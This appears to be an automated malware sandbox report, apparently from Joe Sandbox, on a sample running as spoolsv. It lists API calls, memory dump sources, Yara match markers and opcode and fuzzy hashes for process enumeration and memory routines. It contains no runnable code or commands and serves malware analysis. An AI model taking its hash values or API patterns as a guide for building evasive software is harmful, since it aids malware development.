                                                                                                        • Opcode Fuzzy Hash: aa5b044c588ddfdc3210c4c3c0d3926e160f7f3b193a84c3919e26267408e9fe
                                                                                                        • Instruction Fuzzy Hash: 14C080A3601520374A1066F53CC4DC34B4DCD451F63144477B505D3213D62D4C1461A4
                                                                                                        APIs
                                                                                                          • Part of subcall function 004CF34C: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,004CF5D3,?,00000000,004E6FF3,00000000,004E719A,?,?,?,?,00000000,00000000), ref: 004CF360
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 004CF378
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 004CF38A
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 004CF39C
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 004CF3AE
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 004CF3C0
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 004CF3D2
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Process32First), ref: 004CF3E4
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004CF3F6
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 004CF408
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 004CF41A
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 004CF42C
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 004CF43E
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Module32First), ref: 004CF450
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 004CF462
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 004CF474
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 004CF486
                                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 004CF659
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$HandleModuleNextProcess32
                                                                                                        • String ID:
                                                                                                        • API String ID: 2237597116-0
                                                                                                        • Opcode ID: 8c9a0a4278b6fcd838e880fa5d4eae8115870c90ca26a6c5a323d4618d1d0444
                                                                                                        • Instruction ID: f7a2506f4e2c2bd292fd072077a1b2b4fe2edb9bc32b43aa5964b395e8fa5f96
                                                                                                        • Opcode Fuzzy Hash: 8c9a0a4278b6fcd838e880fa5d4eae8115870c90ca26a6c5a323d4618d1d0444
                                                                                                        • Instruction Fuzzy Hash: F9C080B3301620178F1076F53C84DD34B4DCD491F73040477B505D3212D66D8C046194

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 708 4cf628-4cf635 call 4cf34c 711 4cf637-4cf641 Process32FirstW 708->711 712 4cf642-4cf646 708->712
                                                                                                        APIs
                                                                                                          • Part of subcall function 004CF34C: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,004CF5D3,?,00000000,004E6FF3,00000000,004E719A,?,?,?,?,00000000,00000000), ref: 004CF360
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 004CF378
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 004CF38A
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 004CF39C
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 004CF3AE
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 004CF3C0
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 004CF3D2
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Process32First), ref: 004CF3E4
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004CF3F6
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 004CF408
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 004CF41A
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 004CF42C
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 004CF43E
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Module32First), ref: 004CF450
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 004CF462
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 004CF474
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 004CF486
                                                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 004CF639
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$FirstHandleModuleProcess32
                                                                                                        • String ID:
                                                                                                        • API String ID: 2774106396-0
                                                                                                        • Opcode ID: 1b2f9cd772ea828f0587b818af3bf864f9015723f77f16aa6c12ecd14a310dd8
                                                                                                        • Instruction ID: cea9194b1bec40b452e46435030e9f6d0a77cd9c208c2d682c677ae1133cc5ba
                                                                                                        • Opcode Fuzzy Hash: 1b2f9cd772ea828f0587b818af3bf864f9015723f77f16aa6c12ecd14a310dd8
                                                                                                        • Instruction Fuzzy Hash: 81C080A3301530174A1076F53C85DD34F4DCD451F63144477B504D3213D66D8C156294
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2169309024.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2167521355.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2172515144.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: yymmdd
                                                                                                        • API String ID: 0-2871001947
                                                                                                        • Opcode ID: c2f0850ca05741d5544196295116c66d8b32a17802d8640e374434aa3ec15c18
                                                                                                        • Instruction ID: f15f1b85a0f637e4cae317bac7f6929bfb3b2a163c4115d7559e6a64fae5d6e2
                                                                                                        • Opcode Fuzzy Hash: c2f0850ca05741d5544196295116c66d8b32a17802d8640e374434aa3ec15c18
                                                                                                        • Instruction Fuzzy Hash: 6951E9B5900208EBDB04DFE4DD98BDEBBB8BF48305F108129F506BB6A0DB745A49CB54
                                                                                                        APIs
                                                                                                        • VirtualFree.KERNEL32(?,?,00004000), ref: 00422924
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FreeVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 1263568516-0
                                                                                                        • Opcode ID: 324a51b74da253537b253d891f19afd814ae007f76c7ef41f2610dd7fb034b42
                                                                                                        • Instruction ID: 90b6aa8fc387ceb18a887af8a54e4aae20ad55db79348811f77ef19120a841c5
                                                                                                        • Opcode Fuzzy Hash: 324a51b74da253537b253d891f19afd814ae007f76c7ef41f2610dd7fb034b42
                                                                                                        • Instruction Fuzzy Hash: E02100B4204212DFC750CF28D980A5ABBE4FF99310F60496AE994CB310D371E948CF56
                                                                                                        APIs
                                                                                                        • VirtualFree.KERNEL32(?,?,00004000), ref: 00422924
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2167521355.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2172515144.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FreeVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 1263568516-0
                                                                                                        • Opcode ID: 324a51b74da253537b253d891f19afd814ae007f76c7ef41f2610dd7fb034b42
                                                                                                        • Instruction ID: 90b6aa8fc387ceb18a887af8a54e4aae20ad55db79348811f77ef19120a841c5
                                                                                                        • Opcode Fuzzy Hash: 324a51b74da253537b253d891f19afd814ae007f76c7ef41f2610dd7fb034b42
                                                                                                        • Instruction Fuzzy Hash: E02100B4204212DFC750CF28D980A5ABBE4FF99310F60496AE994CB310D371E948CF56
                                                                                                        APIs
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004229C3), ref: 00422686
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FreeVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 1263568516-0
                                                                                                        • Opcode ID: 247e92d39d1f8c32a233882610808adfe31950c6fd4b9b6067f9f14b00473830
                                                                                                        • Instruction ID: dad5cfe4248d8bab246a3d25b008404abdce35bce64d087442e73adda1e8f828
                                                                                                        • Opcode Fuzzy Hash: 247e92d39d1f8c32a233882610808adfe31950c6fd4b9b6067f9f14b00473830
                                                                                                        • Instruction Fuzzy Hash: DBF02E73B006303BDB20596A5E81B535AC59F95790F950077F948EF3CDD5E98C054399
                                                                                                        APIs
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004229C3), ref: 00422686
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2167521355.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2172515144.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FreeVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 1263568516-0
                                                                                                        • Opcode ID: 247e92d39d1f8c32a233882610808adfe31950c6fd4b9b6067f9f14b00473830
                                                                                                        • Instruction ID: dad5cfe4248d8bab246a3d25b008404abdce35bce64d087442e73adda1e8f828
                                                                                                        • Opcode Fuzzy Hash: 247e92d39d1f8c32a233882610808adfe31950c6fd4b9b6067f9f14b00473830
                                                                                                        • Instruction Fuzzy Hash: DBF02E73B006303BDB20596A5E81B535AC59F95790F950077F948EF3CDD5E98C054399
                                                                                                        APIs
                                                                                                        • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 0056466B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275171209-0
                                                                                                        • Opcode ID: 3458b433ebb35ab6b83173c0e5f9c4d5c9db5b09a13dfc6663b68e427115ed3f
                                                                                                        • Instruction ID: ad2aa484d1772a38b6f3c9364045a751c64e4889beea1b58f91d59234429b9fb
                                                                                                        • Opcode Fuzzy Hash: 3458b433ebb35ab6b83173c0e5f9c4d5c9db5b09a13dfc6663b68e427115ed3f
                                                                                                        • Instruction Fuzzy Hash: D0E0E2B2300248ABDF24CE8CD884BAB379DB759310F108411FA29D7604C675EC50AB61
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2167521355.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2172515144.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ,4B
                                                                                                        • API String ID: 0-3991844317
                                                                                                        • Opcode ID: 8ff27b8217d493c07472fe6b1d30cc509388e0ea78a9f24c628ca7206849fcec
                                                                                                        • Instruction ID: 2e62f071ec061e269e0af2fbab426198be3a6a271d82a0366f1eceefab834b83
                                                                                                        • Opcode Fuzzy Hash: 8ff27b8217d493c07472fe6b1d30cc509388e0ea78a9f24c628ca7206849fcec
                                                                                                        • Instruction Fuzzy Hash: D7D017B23186208FD3406FA9A89462A77F4AB98312F51183EE0C1C2301D63D89449B16
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2169309024.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2167521355.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2172515144.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a83ff5ffc417f83f4d41acb1b4fd39f3d50246cb43ecf1de3bdcce26b5ed6742
                                                                                                        • Instruction ID: 32f108f087d7d4630656b8080de6af3654730a431ac790d0d60a92850006a6c2
                                                                                                        • Opcode Fuzzy Hash: a83ff5ffc417f83f4d41acb1b4fd39f3d50246cb43ecf1de3bdcce26b5ed6742
                                                                                                        • Instruction Fuzzy Hash: 3A81B5B1D00248EBDB04DFE4DE58BDEBBB4BB48305F10852AE612B76A0DB745A45CB58
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2167521355.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2172515144.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: dafe4ae703c94027c61682fa393aab4e794a961f154c1b890746c1e944275571
                                                                                                        • Instruction ID: 73ee6168823af3f290b0d29e05c2a6dbec2158b3bd084ab17ee3d9878e5a0866
                                                                                                        • Opcode Fuzzy Hash: dafe4ae703c94027c61682fa393aab4e794a961f154c1b890746c1e944275571
                                                                                                        • Instruction Fuzzy Hash: 682103B4604256EFC750DF2CD980A5ABBE0FF98350F508A2AF998CB344D374E944CB56
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2167521355.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2172515144.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 816a14491cab5d026b5f441abda892b9675d3a7d8d7b13345878cec3e84f2dc9
                                                                                                        • Instruction ID: d7beefd1e6405fdea3e9c6273c58dc6a0626c210e84cf1c492073799e8a8348a
                                                                                                        • Opcode Fuzzy Hash: 816a14491cab5d026b5f441abda892b9675d3a7d8d7b13345878cec3e84f2dc9
                                                                                                        • Instruction Fuzzy Hash: C201F932B04A149FD7108F59EC8485AFBE8FB05720BA641BBE518D3750E735AC50CAD8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2169309024.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2167521355.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2172515144.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: bba16db9fe18d1294021216763c91cb410f3f25e548062a572f5b041e07ffa40
                                                                                                        • Instruction ID: 20dc9a41ebc36c65f54ff828c917c87bbfccee6e827f5727337c9189070ed0dc
                                                                                                        • Opcode Fuzzy Hash: bba16db9fe18d1294021216763c91cb410f3f25e548062a572f5b041e07ffa40
                                                                                                        • Instruction Fuzzy Hash: 05015EB1900205AFCB149FA8C94AB6E7BB8EB44700F50453AF555F3290D73899458B99
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2169309024.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2167521355.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2172515144.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 888c60d2457cf6dbd883993a77a6020c9e73b0fd5a151ae3ce4b865bcf7f8659
                                                                                                        • Instruction ID: 67256ad5df038b3606e19c3fd4962ab61de0c6f9014364b0e1939c668627c31a
                                                                                                        • Opcode Fuzzy Hash: 888c60d2457cf6dbd883993a77a6020c9e73b0fd5a151ae3ce4b865bcf7f8659
                                                                                                        • Instruction Fuzzy Hash: 14F0139628E3C60EC303576409269487F705D4316030A42EBD1C5DF0E3D298494AC767
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2167521355.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2172515144.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: cba690f5d47a957bd741ad652016bf341760dcd598b7de97cca600a313a2a569
                                                                                                        • Instruction ID: 89df57f7bb204646b55b26968683c4ef02bd8f4cea2b8bf6d4b7ab31e3d0ac35
                                                                                                        • Opcode Fuzzy Hash: cba690f5d47a957bd741ad652016bf341760dcd598b7de97cca600a313a2a569
                                                                                                        • Instruction Fuzzy Hash: 07E048753087045F5305EF65F862D26B7A9D7C9710351C57EF80487A50D939B8118468
                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,00429480,?,005080A8), ref: 00426D9D
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00426DAE
                                                                                                        • lstrcpyn.KERNEL32(?,?,?,?,005080A8), ref: 00426DE2
                                                                                                        • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,00429480,?,005080A8), ref: 00426E53
                                                                                                        • lstrcpyn.KERNEL32(?,?,?,?,?,?,kernel32.dll,00429480,?,005080A8), ref: 00426E8E
                                                                                                        • FindFirstFileA.KERNEL32(?,?,?,?,?,?,?,?,kernel32.dll,00429480,?,005080A8), ref: 00426EA1
                                                                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,kernel32.dll,00429480,?,005080A8), ref: 00426EAE
                                                                                                        • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,00429480,?,005080A8), ref: 00426EBA
                                                                                                        • lstrcpyn.KERNEL32(?,?,00000104,?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,00429480), ref: 00426EEE
                                                                                                        • lstrlen.KERNEL32(?,?,?,00000104,?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,00429480), ref: 00426EFA
                                                                                                        • lstrcpyn.KERNEL32(?,?,?,?,?,?,00000104,?,00000000,?,?,?,?,?,?,?), ref: 00426F23
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2167521355.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2172515144.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                        • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                        • API String ID: 3245196872-1565342463
                                                                                                        • Opcode ID: 1e9e5f5c1e60c9c7e11bc2a5435a735d253322c29c089149e56c0a4f5767be2f
                                                                                                        • Instruction ID: 586d1455b15d331b35c2532f7848297220251eb4538b3ec039515ff2587fd6f2
                                                                                                        • Opcode Fuzzy Hash: 1e9e5f5c1e60c9c7e11bc2a5435a735d253322c29c089149e56c0a4f5767be2f
                                                                                                        • Instruction Fuzzy Hash: E3513C71E00129EFCF11DBE8ED85AEFB7B8AF08304F950596A514E7281D7789E44CB68
                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,005080A8), ref: 00426D9D
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00426DAE
                                                                                                        • lstrcpyn.KERNEL32(?,?,?,?,005080A8), ref: 00426DE2
                                                                                                        • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,00000000,?,005080A8), ref: 00426E53
                                                                                                        • lstrcpyn.KERNEL32(?,?,?,?,?,?,kernel32.dll,00000000,?,005080A8), ref: 00426E8E
                                                                                                        • FindFirstFileA.KERNEL32(?,?,?,?,?,?,?,?,kernel32.dll,00000000,?,005080A8), ref: 00426EA1
                                                                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,kernel32.dll,00000000,?,005080A8), ref: 00426EAE
